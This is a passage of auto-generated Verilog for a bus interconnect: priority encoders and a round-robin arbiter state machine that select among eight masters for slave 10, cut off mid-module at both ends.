            if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[7] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[6] ) ) } == 2'h0 ) 
            begin
                s10_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[7] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[6] ) ) } == 2'h1 ) 
                begin
                    s10_msel_pri_enc_pd3_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[7] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[6] ) ) } == 2'h2 ) 
                    begin
                        s10_msel_pri_enc_pd3_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s10_msel_pri_enc_pd3_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s10_msel_pri_enc_valid[3] or  { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[7] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[6] ) ) })
    begin
        if (  !( s10_msel_pri_enc_valid[3]) ) 
        begin
            s10_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[7] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[6] ) ) } == 2'h0 ) 
            begin
                s10_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s10_msel_pri_enc_pd3_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s10_msel_pri_enc_valid[4] or  { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[9] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[8] ) ) })
    begin
        if (  !( s10_msel_pri_enc_valid[4]) ) 
        begin
            s10_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[9] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[8] ) ) } == 2'h0 ) 
            begin
                s10_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[9] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[8] ) ) } == 2'h1 ) 
                begin
                    s10_msel_pri_enc_pd4_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[9] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[8] ) ) } == 2'h2 ) 
                    begin
                        s10_msel_pri_enc_pd4_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s10_msel_pri_enc_pd4_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s10_msel_pri_enc_valid[4] or  { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[9] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[8] ) ) })
    begin
        if (  !( s10_msel_pri_enc_valid[4]) ) 
        begin
            s10_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[9] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[8] ) ) } == 2'h0 ) 
            begin
                s10_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s10_msel_pri_enc_pd4_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s10_msel_pri_enc_valid[5] or  { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[11] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[10] ) ) })
    begin
        if (  !( s10_msel_pri_enc_valid[5]) ) 
        begin
            s10_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[11] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[10] ) ) } == 2'h0 ) 
            begin
                s10_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[11] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[10] ) ) } == 2'h1 ) 
                begin
                    s10_msel_pri_enc_pd5_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[11] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[10] ) ) } == 2'h2 ) 
                    begin
                        s10_msel_pri_enc_pd5_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s10_msel_pri_enc_pd5_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s10_msel_pri_enc_valid[5] or  { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[11] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[10] ) ) })
    begin
        if (  !( s10_msel_pri_enc_valid[5]) ) 
        begin
            s10_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[11] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[10] ) ) } == 2'h0 ) 
            begin
                s10_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s10_msel_pri_enc_pd5_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s10_msel_pri_enc_valid[6] or  { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[13] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[12] ) ) })
    begin
        if (  !( s10_msel_pri_enc_valid[6]) ) 
        begin
            s10_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[13] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[12] ) ) } == 2'h0 ) 
            begin
                s10_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[13] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[12] ) ) } == 2'h1 ) 
                begin
                    s10_msel_pri_enc_pd6_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[13] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[12] ) ) } == 2'h2 ) 
                    begin
                        s10_msel_pri_enc_pd6_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s10_msel_pri_enc_pd6_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s10_msel_pri_enc_valid[6] or  { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[13] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[12] ) ) })
    begin
        if (  !( s10_msel_pri_enc_valid[6]) ) 
        begin
            s10_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[13] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[12] ) ) } == 2'h0 ) 
            begin
                s10_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s10_msel_pri_enc_pd6_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s10_msel_pri_enc_valid[7] or  { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[15] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[14] ) ) })
    begin
        if (  !( s10_msel_pri_enc_valid[7]) ) 
        begin
            s10_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[15] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[14] ) ) } == 2'h0 ) 
            begin
                s10_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[15] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[14] ) ) } == 2'h1 ) 
                begin
                    s10_msel_pri_enc_pd7_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[15] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[14] ) ) } == 2'h2 ) 
                    begin
                        s10_msel_pri_enc_pd7_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s10_msel_pri_enc_pd7_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s10_msel_pri_enc_valid[7] or  { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[15] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[14] ) ) })
    begin
        if (  !( s10_msel_pri_enc_valid[7]) ) 
        begin
            s10_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[15] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[14] ) ) } == 2'h0 ) 
            begin
                s10_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s10_msel_pri_enc_pd7_pri_out_d0 = 4'b0010;
            end
        end
    end
    assign s10_msel_pri_enc_pri_out_tmp = ( ( ( ( ( ( ( ( ( ( s10_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd0_pri_out_d0 ) : ( s10_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s10_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd1_pri_out_d0 ) : ( s10_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd2_pri_out_d0 ) : ( s10_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd3_pri_out_d0 ) : ( s10_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd4_pri_out_d0 ) : ( s10_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd5_pri_out_d0 ) : ( s10_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd6_pri_out_d0 ) : ( s10_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd7_pri_out_d0 ) : ( s10_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) );
    always @ (  ( ( ( ( ( ( ( ( ( ( s10_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd0_pri_out_d0 ) : ( s10_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s10_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd1_pri_out_d0 ) : ( s10_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd2_pri_out_d0 ) : ( s10_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd3_pri_out_d0 ) : ( s10_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd4_pri_out_d0 ) : ( s10_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd5_pri_out_d0 ) : ( s10_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd6_pri_out_d0 ) : ( s10_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd7_pri_out_d0 ) : ( s10_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s10_msel_pri_enc_pri_out_tmp[3] ) 
        begin
            s10_msel_pri_enc_pri_out1 = 2'h3;
        end
        else
        begin 
            if ( s10_msel_pri_enc_pri_out_tmp[2] ) 
            begin
                s10_msel_pri_enc_pri_out1 = 2'h2;
            end
            else
            begin 
                if ( s10_msel_pri_enc_pri_out_tmp[1] ) 
                begin
                    s10_msel_pri_enc_pri_out1 = 2'h1;
                end
                else
                begin 
                    s10_msel_pri_enc_pri_out1 = 2'h0;
                end
            end
        end
    end
    always @ (  ( ( ( ( ( ( ( ( ( ( s10_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd0_pri_out_d0 ) : ( s10_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s10_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd1_pri_out_d0 ) : ( s10_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd2_pri_out_d0 ) : ( s10_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd3_pri_out_d0 ) : ( s10_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd4_pri_out_d0 ) : ( s10_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd5_pri_out_d0 ) : ( s10_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd6_pri_out_d0 ) : ( s10_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s10_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s10_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s10_msel_pri_enc_pd7_pri_out_d0 ) : ( s10_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s10_msel_pri_enc_pri_out_tmp[1] ) 
        begin
            s10_msel_pri_enc_pri_out0 = 2'h1;
        end
        else
        begin 
            s10_msel_pri_enc_pri_out0 = 2'h0;
        end
    end
    always @ (  posedge clk_i)
    begin
        if ( rst_i ) 
        begin
            s10_msel_pri_out <= 2'h0;
        end
        else
        begin 
            if ( s10_next ) 
            begin
                s10_msel_pri_out <= ( ( ( s10_msel_pri_enc_pri_sel == 2'd0 ) ) ? ( 2'h0 ) : ( ( ( ( s10_msel_pri_enc_pri_sel == 2'd1 ) ) ? ( s10_msel_pri_enc_pri_out0 ) : ( s10_msel_pri_enc_pri_out1 ) ) ) );
            end
        end
    end
    assign s10_msel_arb0_req = { ( s10_msel_req[7] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[15] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[14] ) ) } == 2'd0 ) ), ( s10_msel_req[6] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[13] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[12] ) ) } == 2'd0 ) ), ( s10_msel_req[5] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[11] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[10] ) ) } == 2'd0 ) ), ( s10_msel_req[4] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[9] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[8] ) ) } == 2'd0 ) ), ( s10_msel_req[3] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[7] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[6] ) ) } == 2'd0 ) ), ( s10_msel_req[2] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[5] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[4] ) ) } == 2'd0 ) ), ( s10_msel_req[1] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[3] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[2] ) ) } == 2'd0 ) ), ( s10_msel_req[0] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[1] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[0] ) ) } == 2'd0 ) ) };
    assign s10_msel_arb0_gnt = s10_msel_arb0_state;
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s10_msel_arb0_state <= s10_msel_arb0_grant0;
        end
        else
        begin 
            s10_msel_arb0_state <= s10_msel_arb0_next_state;
        end
    end
    always @ (  s10_msel_arb0_state or  { ( s10_msel_req[7] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[15] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[14] ) ) } == 2'd0 ) ), ( s10_msel_req[6] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[13] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[12] ) ) } == 2'd0 ) ), ( s10_msel_req[5] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[11] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[10] ) ) } == 2'd0 ) ), ( s10_msel_req[4] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[9] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[8] ) ) } == 2'd0 ) ), ( s10_msel_req[3] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[7] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[6] ) ) } == 2'd0 ) ), ( s10_msel_req[2] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[5] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[4] ) ) } == 2'd0 ) ), ( s10_msel_req[1] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[3] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[2] ) ) } == 2'd0 ) ), ( s10_msel_req[0] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[1] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[0] ) ) } == 2'd0 ) ) } or  1'b0)
    begin
        s10_msel_arb0_next_state = s10_msel_arb0_state;
        case ( s10_msel_arb0_state ) 
        s10_msel_arb0_grant0:
        begin
            if (  !( s10_msel_arb0_req[0]) | 1'b0 ) 
            begin
                if ( s10_msel_arb0_req[1] ) 
                begin
                    s10_msel_arb0_next_state = s10_msel_arb0_grant1;
                end
                else
                begin 
                    if ( s10_msel_arb0_req[2] ) 
                    begin
                        s10_msel_arb0_next_state = s10_msel_arb0_grant2;
                    end
                    else
                    begin 
                        if ( s10_msel_arb0_req[3] ) 
                        begin
                            s10_msel_arb0_next_state = s10_msel_arb0_grant3;
                        end
                        else
                        begin 
                            if ( s10_msel_arb0_req[4] ) 
                            begin
                                s10_msel_arb0_next_state = s10_msel_arb0_grant4;
                            end
                            else
                            begin 
                                if ( s10_msel_arb0_req[5] ) 
                                begin
                                    s10_msel_arb0_next_state = s10_msel_arb0_grant5;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb0_req[6] ) 
                                    begin
                                        s10_msel_arb0_next_state = s10_msel_arb0_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb0_req[7] ) 
                                        begin
                                            s10_msel_arb0_next_state = s10_msel_arb0_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb0_grant1:
        begin
            if (  !( s10_msel_arb0_req[1]) | 1'b0 ) 
            begin
                if ( s10_msel_arb0_req[2] ) 
                begin
                    s10_msel_arb0_next_state = s10_msel_arb0_grant2;
                end
                else
                begin 
                    if ( s10_msel_arb0_req[3] ) 
                    begin
                        s10_msel_arb0_next_state = s10_msel_arb0_grant3;
                    end
                    else
                    begin 
                        if ( s10_msel_arb0_req[4] ) 
                        begin
                            s10_msel_arb0_next_state = s10_msel_arb0_grant4;
                        end
                        else
                        begin 
                            if ( s10_msel_arb0_req[5] ) 
                            begin
                                s10_msel_arb0_next_state = s10_msel_arb0_grant5;
                            end
                            else
                            begin 
                                if ( s10_msel_arb0_req[6] ) 
                                begin
                                    s10_msel_arb0_next_state = s10_msel_arb0_grant6;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb0_req[7] ) 
                                    begin
                                        s10_msel_arb0_next_state = s10_msel_arb0_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb0_req[0] ) 
                                        begin
                                            s10_msel_arb0_next_state = s10_msel_arb0_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb0_grant2:
        begin
            if (  !( s10_msel_arb0_req[2]) | 1'b0 ) 
            begin
                if ( s10_msel_arb0_req[3] ) 
                begin
                    s10_msel_arb0_next_state = s10_msel_arb0_grant3;
                end
                else
                begin 
                    if ( s10_msel_arb0_req[4] ) 
                    begin
                        s10_msel_arb0_next_state = s10_msel_arb0_grant4;
                    end
                    else
                    begin 
                        if ( s10_msel_arb0_req[5] ) 
                        begin
                            s10_msel_arb0_next_state = s10_msel_arb0_grant5;
                        end
                        else
                        begin 
                            if ( s10_msel_arb0_req[6] ) 
                            begin
                                s10_msel_arb0_next_state = s10_msel_arb0_grant6;
                            end
                            else
                            begin 
                                if ( s10_msel_arb0_req[7] ) 
                                begin
                                    s10_msel_arb0_next_state = s10_msel_arb0_grant7;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb0_req[0] ) 
                                    begin
                                        s10_msel_arb0_next_state = s10_msel_arb0_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb0_req[1] ) 
                                        begin
                                            s10_msel_arb0_next_state = s10_msel_arb0_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb0_grant3:
        begin
            if (  !( s10_msel_arb0_req[3]) | 1'b0 ) 
            begin
                if ( s10_msel_arb0_req[4] ) 
                begin
                    s10_msel_arb0_next_state = s10_msel_arb0_grant4;
                end
                else
                begin 
                    if ( s10_msel_arb0_req[5] ) 
                    begin
